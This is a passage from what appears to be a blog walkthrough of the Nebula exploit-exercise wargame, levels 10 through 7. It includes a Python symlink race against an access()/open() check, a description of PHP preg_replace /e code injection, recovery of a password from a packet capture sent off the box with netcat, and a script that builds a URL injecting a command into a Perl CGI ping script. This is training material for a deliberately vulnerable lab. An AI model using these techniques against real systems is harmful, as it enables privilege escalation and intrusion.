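# flip the symlink between the two as fast as we can; renaming over
# the old link makes each flip atomic (ln -sf does unlink + symlink)
for i in range(1000):
    target = "token" if i % 2 else "decoy"
    os.symlink(target, "link.tmp")
    os.replace("link.tmp", "link")

print(os.readlink("link"))
```

If flag10 is invoked repeatedly against `link`, sooner or later access() sees the decoy while open() sees the token.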

Then let’s setup the listening netcat to keep on listening rather than exit using the k switch.

And finally, let’s run flag10 repeatedly using another bash one-liner:

Go back to netcat and we have the token:

There we go – the password for flag10.

Nebula exploit exercises walkthrough – level09

There’s a C setuid wrapper for some vulnerable PHP code…

I’m no PHP expert – this one took me a long time. There are two functions that look dubious there – file_get_contents and preg_replace. Let’s see what it is meant to do.

It looks like it reads the file provided as the first argument ($filename) and does nothing with a second argument ($use_me). The file read in is expected to be in the format:

and it returns a string like so:

You can use the command to get an arbitrary file that flag09 is permissioned for:

But we need to execute something, not read something.

Look closely at one of the preg_replace lines:

This says: take the second matching group and run the spam() function on it. Because the replacement string is evaluated as PHP code (the /e modifier), the second group is substituted inside spam() and then executed. Maybe we can inject a command here.

I’ve recently done a couple of XSS tutorials/games, which have given me a fair bit of practice at command injection (in Javascript, though), and I felt I was getting quite good at it. However, this PHP one ended up being a big case of trial and error.

I started trying to execute phpinfo() – it nearly always works and doesn’t need any parameters passing to it.

Right – this just echos the command.

Ok – it’s now treating phpinfo as a variable, but that variable isn’t defined.

Now we have passed an expression with invalid syntax…

Yes! Ok – so this strange notation with curly braces works. I’m not quite sure why it needs to be like this, but now I have it, I can find examples of people using it.

Now we need to run getflag. PHP has system to do system calls.

Hmm. It is escaping the inverted commas so it doesn’t work. In fact, it seems to escape anything helpful.

Coming back to one of the examples above – we managed to get it to treat phpinfo as a variable. What happens if we try to use the unused parameter, use_me?

Right – so we can use that to pass in a string. Let’s combine the two.

Excellent! I got there in the end. It felt a little painful. If the second parameter hadn’t been called use_me, and this wasn’t an exploit wargame, I would have given up. Not happy with this level.

Nebula exploit exercises walkthrough – level08

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.

A readable pcap file in the flag08 home directory. This is a network capture, so might have some interesting traffic.

Now… we can read this on the terminal using tcpdump:

Even when it is prettied up like this, it’s still hard work – especially if it is a keyboard-interactive process. People using the keyboard expect instant feedback – they press a key, they want to see the screen change. This means that there is a lot of back and forth. Compare this to, say, a request for a web page, which is machine generated and will fit neatly into packets.

So I want to get this file into Wireshark on my local machine. How can we do that? netcat!

(note that these instructions have OS X as the remote end – the command name and options syntax vary from OS to OS)

On the host machine, we do the following:

Listen on port 2001, and pipe any output to the file capture.pcap.

and on the client (Nebula machine) we do this:

Connect to port 2001 and pipe capture.pcap down the connection.

Now we have our file at the other end, it is an easy task to run Wireshark and open the capture.

There is a single connection between two given IPs here. The trace is still hard to follow though, so go to Analyze -> Follow TCP stream. This gives us a nice, coherent conversation:

We can see a login to another machine. We are just going to have to hope for some password re-use. The password bit looks like:

However, those . are not . – they are characters not represented by display characters. Switch the view to hex view and we can see:

Hex view


x7f – DEL (well, backspace). That makes the password backd00Rmate.
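The recovery can be scripted: replay the keystrokes, treating 0x7f as a backspace. (The byte stream below is illustrative – chosen to match the recovered password – rather than copied from the capture.)

```python
def apply_backspaces(data: bytes) -> str:
    # replay keystrokes, treating 0x7f (DEL) as a backspace
    out = []
    for b in data:
        if b == 0x7f:
            if out:
                out.pop()
        else:
            out.append(chr(b))
    return "".join(out)

# illustrative keystroke stream ending in the recovered password
keys = b"backdoor\x7f\x7f\x7f00Rm8\x7fate"
print(apply_backspaces(keys))  # backd00Rmate
```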

Nebula exploit exercises walkthrough – level07

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.

The code of the CGI script is provided (and can be viewed in /home/flag07):



# check if Host set. if not, display normal page, etc


Immediately you can see this is not sanitising or validating the input parameter Host that it passes to a command – ping. We can therefore pass it another command for it to execute.

Let’s test the script out, from the command line to start with:

(I’ve stripped out HTML as I am lazy and can’t be bothered getting it to format correctly).

It just runs ping against localhost, as expected.

Run it without parameters, and we get the help:

And then let’s check we can inject a command:


The challenge now is that, for the first time, this script isn’t set to run suid. If I try running getflag, it isn’t going to work.

That thttpd.conf file in flag07’s home directory looks interesting. Could he be running a test web server?

Excellent – a web server on port 7007.

So, we need to:

  • Connect to the web server running on localhost at port 7007
  • Request index.cgi
  • Pass a Host parameter with a command being careful to URL escape all of the special chars

wget is a simple utility present on nearly all Linux boxes that allows us to get a webpage.

We just need to escape the semi-colon to be %3B.
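Python’s urllib shows the escaping (the injected command here is illustrative; on the box this request was made with wget):

```python
from urllib.parse import quote

# build the attack URL; host/port come from the thttpd.conf found in
# flag07's home directory, the injected command is a stand-in
injected = ";getflag"
url = ("http://localhost:7007/index.cgi?Host=localhost"
       + quote(injected, safe=""))
print(url)
```

quote() percent-encodes the semi-colon (and anything else special) so the CGI script receives it intact inside the Host parameter.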

Check the content of the file and we have run getflag as flag07.